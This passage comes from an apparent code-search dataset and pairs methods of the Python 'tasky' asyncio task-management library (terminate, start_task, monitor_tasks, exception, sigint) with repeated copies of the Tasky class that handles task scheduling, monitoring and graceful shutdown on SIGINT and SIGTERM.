'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.terminate | python | def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop() | Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L175-L208 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.start_task | python | async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total | Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L210-L238 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.monitor_tasks | python | async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate) | Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L240-L276 | [
"async def insert(self, task: Task) -> None:\n '''Insert the given task class into the Tasky event loop.'''\n\n if not isinstance(task, Task):\n task = task()\n\n if task.name not in self.all_tasks:\n task.tasky = self\n self.all_tasks[task.name] = task\n\n await task.init()\n\n... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.exception | python | def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception']) | Log unhandled exceptions from anywhere in the event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L278-L284 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.sigint | python | def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop() | Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L286-L302 | [
"def terminate(self, *, force: bool=False, timeout: float=30.0,\n step: float=1.0) -> None:\n '''Stop all scheduled and/or executing tasks, first by asking nicely,\n and then by waiting up to `timeout` seconds before forcefully stopping\n the asyncio event loop.'''\n\n if isinstance(self.mo... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
